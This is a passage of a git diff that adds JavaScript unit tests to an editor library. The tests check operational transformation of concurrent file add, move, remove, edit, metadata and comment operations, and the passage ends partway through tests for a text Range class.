Snapshot = ot.Snapshot + +describe('Operation', function () { + function makeEmptySnapshot() { + return new Snapshot() + } + + function makeOneFileSnapshot() { + const snapshot = makeEmptySnapshot() + snapshot.addFile('foo', File.fromString('')) + return snapshot + } + + function makeTwoFileSnapshot() { + const snapshot = makeOneFileSnapshot() + snapshot.addFile('bar', File.fromString('a')) + return snapshot + } + + function addFile(pathname, content) { + return new AddFileOperation(pathname, File.fromString(content)) + } + + function roundTripOperation(operation) { + return Operation.fromRaw(operation.toRaw()) + } + + function deepCopySnapshot(snapshot) { + return Snapshot.fromRaw(snapshot.toRaw()) + } + + function runConcurrently(operation0, operation1, snapshot) { + const operations = [ + // make sure they survive serialization + roundTripOperation(operation0), + roundTripOperation(operation1), + ] + const primeOperations = Operation.transform(operation0, operation1) + const originalSnapshot = snapshot || makeEmptySnapshot() + const snapshotA = deepCopySnapshot(originalSnapshot) + const snapshotB = deepCopySnapshot(originalSnapshot) + + operations[0].applyTo(snapshotA) + operations[1].applyTo(snapshotB) + + primeOperations[0].applyTo(snapshotB) + primeOperations[1].applyTo(snapshotA) + expect(snapshotA).to.eql(snapshotB) + + return 
{ + snapshot: snapshotA, + operations, + primeOperations, + + log() { + console.log(this) + return this + }, + + expectNoTransform() { + expect(this.operations).to.deep.eql(this.primeOperations) + return this + }, + + expectTransform() { + expect(this.operations).to.not.deep.eql(this.primeOperations) + return this + }, + + swap() { + return runConcurrently(operation1, operation0, originalSnapshot) + }, + + expectFiles(files) { + this.expectedFiles = files + expect(this.snapshot.countFiles()).to.equal(_.size(files)) + _.forOwn(files, (expectedFile, pathname) => { + if (_.isString(expectedFile)) { + expectedFile = { content: expectedFile, metadata: {}, comments: [] } + } + const file = this.snapshot.getFile(pathname) + expect(file.getContent()).to.equal(expectedFile.content) + expect(file.getMetadata()).to.eql(expectedFile.metadata) + expect(file.getComments().toRaw()).to.deep.equal( + expectedFile.comments + ) + }) + return this + }, + + expectSymmetry() { + if (!this.expectedFiles) { + throw new Error('must call expectFiles before expectSymmetry') + } + this.swap().expectFiles(this.expectedFiles) + return this + }, + + expectPrime(index, klass) { + expect(this.primeOperations[index]).to.be.an.instanceof(klass) + return this + }, + + tap(fn) { + fn.call(this) + return this + }, + } + } + + // shorthand for creating an edit operation + function edit(pathname, textOperationOps) { + return Operation.editFile( + pathname, + TextOperation.fromJSON({ textOperation: textOperationOps }) + ) + } + + it('transforms AddFile-AddFile with different names', function () { + runConcurrently(addFile('foo', ''), addFile('bar', 'a')) + .expectNoTransform() + .expectFiles({ bar: 'a', foo: '' }) + .expectSymmetry() + }) + + it('transforms AddFile-AddFile with same name', function () { + // the second file 'wins' + runConcurrently(addFile('foo', ''), addFile('foo', 'a')) + .expectFiles({ foo: 'a' }) + // if the first add was committed first, the second add overwrites it + .expectPrime(1, AddFileOperation) + // if the second add was committed first, the first add becomes a no-op + .expectPrime(0, NoOperation) + .swap() + .expectFiles({ foo: '' }) + }) + + it('transforms AddFile-MoveFile with no conflict', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + addFile('bar', 'a'), + makeOneFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ bar: 'a', baz: '' }) + .expectSymmetry() + }) + + it('transforms AddFile-MoveFile with move from new file', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + addFile('foo', 'a'), + makeOneFileSnapshot() + ) + .expectFiles({ baz: 'a' }) + // if the move was committed first, the add overwrites it + .expectPrime(1, AddFileOperation) + // if the add was committed first, the move appears in the history + .expectPrime(0, MoveFileOperation) + .expectSymmetry() + }) + + it('transforms AddFile-MoveFile with move to new file', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + addFile('baz', 'a'), + makeOneFileSnapshot() + ) + .expectFiles({ baz: 'a' }) + // if the move was committed first, the add overwrites it + .expectPrime(1, AddFileOperation) + // if the add was committed first, the move becomes a delete + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[0].isRemoveFile()).to.be.true + }) + .expectSymmetry() + }) + + it('transforms AddFile-RemoveFile with no conflict', function () { + runConcurrently( + Operation.removeFile('foo'), + addFile('bar', 'a'), + makeOneFileSnapshot() + ) + 
.expectNoTransform()
+      .expectFiles({ bar: 'a' })
+      .expectSymmetry()
+  })
+
+  it('transforms AddFile-RemoveFile that removes added file', function () {
+    runConcurrently(
+      Operation.removeFile('foo'),
+      addFile('foo', 'a'),
+      makeOneFileSnapshot()
+    )
+      .expectFiles({ foo: 'a' })
+      // if the remove was committed first, the add overwrites it
+      .expectPrime(1, AddFileOperation)
+      // if the add was committed first, the remove gets dropped
+      .expectPrime(0, NoOperation)
+      .expectSymmetry()
+  })
+
+  it('transforms AddFile-EditFile with no conflict', function () {
+    runConcurrently(
+      edit('foo', ['x']),
+      addFile('bar', 'a'),
+      makeOneFileSnapshot()
+    )
+      .expectNoTransform()
+      .expectFiles({ bar: 'a', foo: 'x' })
+      .expectSymmetry()
+  })
+
+  it('transforms AddFile-EditFile when new file is edited', function () {
+    runConcurrently(
+      edit('foo', ['x']),
+      addFile('foo', 'a'),
+      makeOneFileSnapshot()
+    )
+      .expectFiles({ foo: 'a' })
+      // if the edit was committed first, the add overwrites it
+      .expectPrime(1, AddFileOperation)
+      // if the add was committed first, the edit gets dropped
+      .expectPrime(0, NoOperation)
+      .expectSymmetry()
+  })
+
+  it('transforms AddFile-SetFileMetadata with no conflict', function () {
+    const testMetadata = { baz: 1 }
+    runConcurrently(
+      addFile('bar', 'a'),
+      Operation.setFileMetadata('foo', testMetadata),
+      makeOneFileSnapshot()
+    )
+      .expectNoTransform()
+      .expectFiles({
+        foo: { content: '', metadata: testMetadata, comments: [] },
+        bar: 'a',
+      })
+      .expectSymmetry()
+  })
+
+  it('transforms AddFile-SetFileMetadata with same name', function () {
+    const testMetadata = { baz: 1 }
+    runConcurrently(
+      addFile('foo', 'x'),
+      Operation.setFileMetadata('foo', testMetadata),
+      makeEmptySnapshot()
+    )
+      .expectFiles({
+        foo: { content: 'x', metadata: testMetadata, comments: [] },
+      })
+      .expectSymmetry()
+  })
+
+  it('transforms MoveFile-MoveFile with no conflict', function () {
+    runConcurrently(
+      Operation.moveFile('foo', 'baz'),
+      Operation.moveFile('bar', 'bat'),
+      makeTwoFileSnapshot()
+    )
+      .expectFiles({ bat: 'a', baz: '' })
+      .expectNoTransform()
+      .expectSymmetry()
+  })
+
+  it('transforms MoveFile-MoveFile same move foo->foo, foo->foo', function () {
+    runConcurrently(
+      Operation.moveFile('foo', 'foo'),
+      Operation.moveFile('foo', 'foo'),
+      makeOneFileSnapshot()
+    )
+      .expectFiles({ foo: '' })
+      .expectPrime(1, NoOperation)
+      .expectPrime(0, NoOperation)
+      .expectSymmetry()
+  })
+
+  it('transforms MoveFile-MoveFile no-op foo->foo, foo->bar', function () {
+    runConcurrently(
+      Operation.moveFile('foo', 'foo'),
+      Operation.moveFile('foo', 'bar'),
+      makeOneFileSnapshot()
+    )
+      .expectFiles({ bar: '' })
+      .expectPrime(1, MoveFileOperation)
+      .expectPrime(0, NoOperation)
+      .expectSymmetry()
+  })
+
+  it('transforms MoveFile-MoveFile no-op foo->foo, foo->bar with two files', function () {
+    runConcurrently(
+      Operation.moveFile('foo', 'foo'),
+      Operation.moveFile('foo', 'bar'),
+      makeTwoFileSnapshot()
+    )
+      .expectFiles({ bar: '' })
+      .expectPrime(1, MoveFileOperation)
+      .expectPrime(0, NoOperation)
+      .expectSymmetry()
+  })
+
+  it('transforms MoveFile-MoveFile no-op foo->foo, bar->bar', function () {
+    runConcurrently(
+      Operation.moveFile('foo', 'foo'),
+      Operation.moveFile('bar', 'bar'),
+      makeTwoFileSnapshot()
+    )
+      .expectFiles({ bar: 'a', foo: '' })
+      .expectPrime(1, NoOperation)
+      .expectPrime(0, NoOperation)
+      .expectSymmetry()
+  })
+
+  it('transforms MoveFile-MoveFile same move foo->bar, foo->bar', function () {
+    runConcurrently(
+      Operation.moveFile('foo', 'bar'),
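+      // identical concurrent moves are expected to transform to no-ops on
+      // both sides (see the NoOperation primes below)
+      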
Operation.moveFile('foo', 'bar'), + makeOneFileSnapshot() + ) + .expectFiles({ bar: '' }) + .expectPrime(1, NoOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile opposite foo->bar, bar->foo', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.moveFile('bar', 'foo'), + makeTwoFileSnapshot() + ) + .expectFiles([]) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + expect(this.primeOperations[1].getPathname()).to.equal('bar') + + expect(this.primeOperations[0].isRemoveFile()).to.be.true + expect(this.primeOperations[0].getPathname()).to.equal('foo') + }) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile no-op foo->foo, bar->baz', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.moveFile('bar', 'baz'), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: 'a', foo: '' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile diverge foo->bar, foo->baz', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.moveFile('foo', 'baz'), + makeOneFileSnapshot() + ) + .expectFiles({ baz: '' }) + // if foo->bar was committed first, the second move becomes bar->baz + .expectPrime(1, MoveFileOperation) + // if foo->baz was committed first, the second move becomes a no-op + .expectPrime(0, NoOperation) + .tap(function () { + expect(this.primeOperations[1].getPathname()).to.equal('bar') + expect(this.primeOperations[1].getNewPathname()).to.equal('baz') + }) + .swap() + .expectFiles({ bar: '' }) + }) + + it('transforms MoveFile-MoveFile transitive foo->baz, bar->foo', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + Operation.moveFile('bar', 'foo'), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: 'a' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile transitive foo->bar, bar->baz', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.moveFile('bar', 'baz'), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: '' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile converge foo->baz, bar->baz', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + Operation.moveFile('bar', 'baz'), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: 'a' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + // if foo->baz was committed first, we just apply the move + expect(this.primeOperations[1]).to.eql(this.operations[1]) + + // if bar->baz was committed first, the other move becomes a remove + expect(this.primeOperations[0].isRemoveFile()).to.be.true + expect(this.primeOperations[0].getPathname()).to.equal('foo') + }) + .swap() + .expectFiles({ baz: '' }) + }) + + it('transforms MoveFile-RemoveFile no-op foo->foo, foo->', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.removeFile('foo'), + makeOneFileSnapshot() + ) + .expectFiles([]) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, NoOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + }) + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile same move foo->, foo->', function () { + 
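+    // in this suite a remove is modelled as a MoveFile variant (see the
+    // isRemoveFile() checks above), hence the MoveFile-RemoveFile grouping
+    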
runConcurrently( + Operation.removeFile('foo'), + Operation.removeFile('foo'), + makeOneFileSnapshot() + ) + .expectFiles([]) + .expectPrime(1, NoOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile no conflict foo->, bar->', function () { + runConcurrently( + Operation.removeFile('foo'), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectFiles([]) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile no conflict foo->foo, bar->', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectFiles({ foo: '' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, NoOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + }) + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile transitive foo->, bar->foo', function () { + runConcurrently( + Operation.removeFile('foo'), + Operation.moveFile('bar', 'foo'), + makeTwoFileSnapshot() + ) + .expectFiles([]) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + expect(this.primeOperations[1].getPathname()).to.equal('bar') + + expect(this.primeOperations[0].isRemoveFile()).to.be.true + expect(this.primeOperations[0].getPathname()).to.equal('foo') + }) + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile transitive foo->bar, bar->', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectFiles({}) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + expect(this.primeOperations[1].getPathname()).to.equal('bar') + + expect(this.primeOperations[0].isRemoveFile()).to.be.true + expect(this.primeOperations[0].getPathname()).to.equal('foo') + }) + .expectSymmetry() + }) + + it('transforms MoveFile-EditFile with no conflict', function () { + runConcurrently( + Operation.moveFile('bar', 'baz'), + edit('foo', ['x']), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: 'a', foo: 'x' }) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms MoveFile-EditFile with edit on pathname', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + edit('foo', ['x']), + makeOneFileSnapshot() + ) + .expectFiles({ bar: 'x' }) + .expectPrime(1, EditFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[1].getPathname()).to.equal('bar') + + expect(this.primeOperations[0].getPathname()).to.equal('foo') + expect(this.primeOperations[0].getNewPathname()).to.equal('bar') + }) + .expectSymmetry() + }) + + it('transforms MoveFile-EditFile with edit on new pathname', function () { + runConcurrently( + Operation.moveFile('bar', 'foo'), + edit('foo', ['x']), + makeTwoFileSnapshot() + ) + .expectFiles({ foo: 'a' }) + .expectPrime(1, NoOperation) + .tap(function () { + expect(this.primeOperations[0]).to.eql(this.operations[0]) + }) + .expectSymmetry() + }) + + it('transforms MoveFile-EditFile with no-op move', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + edit('foo', ['x']), + makeOneFileSnapshot() + ) + .expectFiles({ foo: 'x' }) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms MoveFile-SetFileMetadata with no conflict', function () { + const testMetadata = { 
baz: 1 } + runConcurrently( + Operation.moveFile('foo', 'baz'), + Operation.setFileMetadata('bar', testMetadata), + makeTwoFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + bar: { content: 'a', metadata: testMetadata, comments: [] }, + baz: '', + }) + .expectSymmetry() + }) + + it('transforms MoveFile-SetFileMetadata with set on pathname', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.setFileMetadata('foo', testMetadata), + makeOneFileSnapshot() + ) + .expectFiles({ + bar: { content: '', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms MoveFile-SetFileMetadata w/ set on new pathname', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.setFileMetadata('bar', testMetadata), + makeTwoFileSnapshot() + ) + // move wins + .expectFiles({ bar: { content: '', metadata: {}, comments: [] } }) + .expectSymmetry() + }) + + it('transforms MoveFile-SetFileMetadata with no-op move', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.setFileMetadata('foo', testMetadata), + makeOneFileSnapshot() + ) + .expectFiles({ + foo: { content: '', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms EditFile-EditFile with no conflict', function () { + runConcurrently( + edit('foo', ['x']), + edit('bar', [1, 'x']), + makeTwoFileSnapshot() + ) + .expectFiles({ bar: 'ax', foo: 'x' }) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms EditFile-EditFile on same file', function () { + runConcurrently( + edit('foo', ['x']), + edit('foo', ['y']), + makeOneFileSnapshot() + ) + .expectFiles({ foo: 'xy' }) + .expectPrime(1, EditFileOperation) + .expectPrime(0, EditFileOperation) + .tap(function () { + expect(this.primeOperations[1].getOperation().toJSON()).to.eql({ + textOperation: [1, 'y'], + }) + expect(this.primeOperations[0].getOperation().toJSON()).to.eql({ + textOperation: ['x', 1], + }) + }) + .swap() + .expectFiles({ foo: 'yx' }) + }) + + it('transforms EditFile-RemoveFile with no conflict', function () { + runConcurrently( + edit('foo', ['x']), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectFiles({ foo: 'x' }) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms EditFile-RemoveFile on same file', function () { + runConcurrently( + edit('foo', ['x']), + Operation.removeFile('foo'), + makeOneFileSnapshot() + ) + .expectFiles({}) + .expectSymmetry() + }) + + it('transforms EditFile-SetFileMetadata with no conflict', function () { + const testMetadata = { baz: 1 } + runConcurrently( + edit('foo', ['x']), + Operation.setFileMetadata('bar', testMetadata), + makeTwoFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + foo: { content: 'x', metadata: {}, comments: [] }, + bar: { content: 'a', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms EditFile-SetFileMetadata on same file', function () { + const testMetadata = { baz: 1 } + runConcurrently( + edit('foo', ['x']), + Operation.setFileMetadata('foo', testMetadata), + makeOneFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + foo: { content: 'x', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms SetFileMetadata-SetFileMetadata w/ no conflict', function () { + runConcurrently( + Operation.setFileMetadata('foo', { baz: 1 }), + 
Operation.setFileMetadata('bar', { baz: 2 }), + makeTwoFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + foo: { content: '', metadata: { baz: 1 }, comments: [] }, + bar: { content: 'a', metadata: { baz: 2 }, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms SetFileMetadata-SetFileMetadata on same file', function () { + runConcurrently( + Operation.setFileMetadata('foo', { baz: 1 }), + Operation.setFileMetadata('foo', { baz: 2 }), + makeOneFileSnapshot() + ) + // second op wins + .expectFiles({ foo: { content: '', metadata: { baz: 2 }, comments: [] } }) + .swap() + // first op wins + .expectFiles({ foo: { content: '', metadata: { baz: 1 }, comments: [] } }) + }) + + it('transforms SetFileMetadata-RemoveFile with no conflict', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.setFileMetadata('foo', testMetadata), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + foo: { content: '', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms SetFileMetadata-RemoveFile on same file', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.setFileMetadata('foo', testMetadata), + Operation.removeFile('foo'), + makeOneFileSnapshot() + ) + .expectFiles({}) + .expectSymmetry() + }) + + it('transforms no-op with other operation', function () { + runConcurrently(Operation.NO_OP, addFile('foo', 'test')).expectFiles({ + foo: 'test', + }) + }) + + describe('EditFile sub operations', function () { + it('transforms AddCommentOperation-AddCommentOperation', function () { + runConcurrently( + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [ + { + pos: 10, + length: 2, + }, + ], + }) + ), + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [ + { + id: '1', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }, + ], + }, + }) + }) + + it('transforms TextOperation-AddCommentOperation', function () { + runConcurrently( + Operation.editFile( + 'foo', + TextOperation.fromJSON({ textOperation: ['xyz'] }) + ), + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: 'xyz', + metadata: {}, + comments: [{ id: '1', ranges: [{ pos: 3, length: 1 }] }], + }, + }) + .expectSymmetry() + }) + + it('transforms TextOperation-AddCommentOperation (insert with commentId)', function () { + runConcurrently( + Operation.editFile( + 'foo', + TextOperation.fromJSON({ + textOperation: [{ i: 'xyz', commentIds: ['1'] }], + }) + ), + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: 'xyz', + metadata: {}, + comments: [{ id: '1', ranges: [{ pos: 0, length: 4 }] }], + }, + }) + .expectSymmetry() + }) + + it('transforms AddCommentOperation-SetCommentStateOperation', function () { + runConcurrently( + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [{ pos: 1, length: 2 }], + }) + ), + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: 
'1', + resolved: true, + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [ + { id: '1', ranges: [{ pos: 1, length: 2 }], resolved: true }, + ], + }, + }) + .expectSymmetry() + }) + + it('transforms AddCommentOperation-DeleteCommentOperation ', function () { + runConcurrently( + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [{ pos: 1, length: 2 }], + }) + ), + Operation.editFile( + 'foo', + DeleteCommentOperation.fromJSON({ deleteComment: '1' }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [], + }, + }) + .expectSymmetry() + }) + + it('transforms DeleteCommentOperation-SetCommentStateOperation ', function () { + runConcurrently( + Operation.editFile( + 'foo', + DeleteCommentOperation.fromJSON({ deleteComment: '1' }) + ), + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: true, + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [], + }, + }) + .expectSymmetry() + }) + + it('transforms DeleteCommentOperation-DeleteCommentOperation ', function () { + runConcurrently( + Operation.editFile( + 'foo', + DeleteCommentOperation.fromJSON({ deleteComment: '1' }) + ), + Operation.editFile( + 'foo', + DeleteCommentOperation.fromJSON({ deleteComment: '1' }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [], + }, + }) + .expectSymmetry() + }) + + it('transforms SetCommentStateOperation-SetCommentStateOperation to resolved comment', function () { + const snapshot = makeEmptySnapshot() + const file = new File( + new StringFileData('xyz', [ + { id: '1', ranges: [{ pos: 0, length: 3 }] }, + ]) + ) + snapshot.addFile('foo', file) + + runConcurrently( + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: true, + }) + ), + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: true, + }) + ), + snapshot + ) + .expectTransform() + .expectFiles({ + foo: { + content: 'xyz', + metadata: {}, + comments: [ + { id: '1', ranges: [{ pos: 0, length: 3 }], resolved: true }, + ], + }, + }) + .expectSymmetry() + }) + + it('transforms SetCommentStateOperation-SetCommentStateOperation to unresolved comment', function () { + const snapshot = makeEmptySnapshot() + const file = new File( + new StringFileData('xyz', [ + { id: '1', ranges: [{ pos: 0, length: 3 }] }, + ]) + ) + snapshot.addFile('foo', file) + + runConcurrently( + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: true, + }) + ), + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: false, + }) + ), + snapshot + ) + .expectTransform() + .expectFiles({ + foo: { + content: 'xyz', + metadata: {}, + comments: [{ id: '1', ranges: [{ pos: 0, length: 3 }] }], + }, + }) + .expectSymmetry() + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/range.test.js b/libraries/overleaf-editor-core/test/range.test.js new file mode 100644 index 0000000..daad8fd --- /dev/null +++ b/libraries/overleaf-editor-core/test/range.test.js @@ -0,0 +1,452 @@ +// @ts-check +'use strict' + +const { expect } = require('chai') +const Range = require('../lib/range') + +describe('Range', function () { + it('should create a 
range', function () {
+    const from5to14 = new Range(5, 10)
+    expect(from5to14.start).to.eql(5)
+    expect(from5to14.end).to.eql(15)
+  })
+
+  it('should create a range using fromRaw', function () {
+    const from5to14 = Range.fromRaw({ pos: 5, length: 10 })
+    expect(from5to14.start).to.eql(5)
+    expect(from5to14.end).to.eql(15)
+  })
+
+  it('should convert to raw', function () {
+    const from5to14 = new Range(5, 10)
+    expect(from5to14.toRaw()).to.eql({ pos: 5, length: 10 })
+  })
+
+  it('should check isEmpty method', function () {
+    const from5to14 = new Range(5, 10)
+    expect(from5to14.isEmpty()).to.be.false
+
+    const range0length = new Range(5, 0)
+    expect(range0length.isEmpty()).to.be.true
+  })
+
+  it('should not create a range with a negative position', function () {
+    expect(() => new Range(-1, 10)).to.throw()
+  })
+
+  it('should not create a range with a negative length', function () {
+    expect(() => new Range(0, -2)).to.throw()
+  })
+
+  describe('overlaps', function () {
+    it('same ranges should overlap', function () {
+      const range1 = new Range(1, 3)
+      const range2 = new Range(1, 3)
+      expect(range1.overlaps(range2)).to.eql(true)
+    })
+
+    it('non-touching ranges should not overlap', function () {
+      const from1to3 = new Range(1, 3)
+      const from10to12 = new Range(10, 3)
+      expect(from1to3.overlaps(from10to12)).to.eql(false)
+      expect(from10to12.overlaps(from1to3)).to.eql(false)
+    })
+
+    it('touching ranges should not overlap', function () {
+      const from1to3 = new Range(1, 3)
+      const from4to6 = new Range(4, 3)
+      expect(from1to3.overlaps(from4to6)).to.eql(false)
+      expect(from4to6.overlaps(from1to3)).to.eql(false)
+    })
+
+    it('should overlap', function () {
+      const from1to3 = new Range(1, 3)
+      const from2to4 = new Range(2, 3)
+      expect(from1to3.overlaps(from2to4)).to.eql(true)
+      expect(from2to4.overlaps(from1to3)).to.eql(true)
+    })
+  })
+
+  describe('touches', function () {
+    it('should not touch if ranges are the same', function () {
+      const range1 = new Range(1, 3)
+      const range2 = new Range(1, 3)
+      expect(range1.touches(range2)).to.eql(false)
+      expect(range2.touches(range1)).to.eql(false)
+    })
+
+    it('should return true when ranges touch at one point', function () {
+      const from1to3 = new Range(1, 3)
+      const from4to5 = new Range(4, 2)
+      expect(from1to3.touches(from4to5)).to.eql(true)
+      expect(from4to5.touches(from1to3)).to.eql(true)
+    })
+
+    it('should return false when ranges do not touch', function () {
+      const from1to3 = new Range(1, 3)
+      const from5to6 = new Range(5, 2)
+      expect(from1to3.touches(from5to6)).to.eql(false)
+      expect(from5to6.touches(from1to3)).to.eql(false)
+    })
+
+    it('should return false when ranges overlap', function () {
+      const from1to3 = new Range(1, 3)
+      const from3to4 = new Range(3, 2)
+      expect(from1to3.touches(from3to4)).to.eql(false)
+      expect(from3to4.touches(from1to3)).to.eql(false)
+    })
+  })
+
+  it('should check if range contains another', function () {
+    const from0to2 = new Range(0, 3)
+    const from4to13 = new Range(4, 10)
+    const from4to14 = new Range(4, 11)
+    const from4to15 = new Range(4, 12)
+    const from5to13 = new Range(5, 9)
+    const from5to14 = new Range(5, 10)
+    const from5to15 = new Range(5, 11)
+    const from0to99 = new Range(0, 100)
+
+    expect(from0to2.contains(from0to2)).to.eql(true)
+    expect(from0to2.contains(from4to13)).to.eql(false)
+    expect(from0to2.contains(from4to14)).to.eql(false)
+    expect(from0to2.contains(from4to15)).to.eql(false)
+    expect(from0to2.contains(from5to13)).to.eql(false)
+    expect(from0to2.contains(from5to14)).to.eql(false)
+    
expect(from0to2.contains(from5to15)).to.eql(false) + expect(from0to2.contains(from0to99)).to.eql(false) + + expect(from4to13.contains(from0to2)).to.eql(false) + expect(from4to13.contains(from4to13)).to.eql(true) + expect(from4to13.contains(from4to14)).to.eql(false) + expect(from4to13.contains(from4to15)).to.eql(false) + expect(from4to13.contains(from5to13)).to.eql(true) + expect(from4to13.contains(from5to14)).to.eql(false) + expect(from4to13.contains(from5to15)).to.eql(false) + expect(from4to13.contains(from0to99)).to.eql(false) + + expect(from4to14.contains(from0to2)).to.eql(false) + expect(from4to14.contains(from4to13)).to.eql(true) + expect(from4to14.contains(from4to14)).to.eql(true) + expect(from4to14.contains(from4to15)).to.eql(false) + expect(from4to14.contains(from5to13)).to.eql(true) + expect(from4to14.contains(from5to14)).to.eql(true) + expect(from4to14.contains(from5to15)).to.eql(false) + expect(from4to14.contains(from0to99)).to.eql(false) + + expect(from4to15.contains(from0to2)).to.eql(false) + expect(from4to15.contains(from4to13)).to.eql(true) + expect(from4to15.contains(from4to14)).to.eql(true) + expect(from4to15.contains(from4to15)).to.eql(true) + expect(from4to15.contains(from5to13)).to.eql(true) + expect(from4to15.contains(from5to14)).to.eql(true) + expect(from4to15.contains(from5to15)).to.eql(true) + expect(from4to15.contains(from0to99)).to.eql(false) + + expect(from5to13.contains(from0to2)).to.eql(false) + expect(from5to13.contains(from4to13)).to.eql(false) + 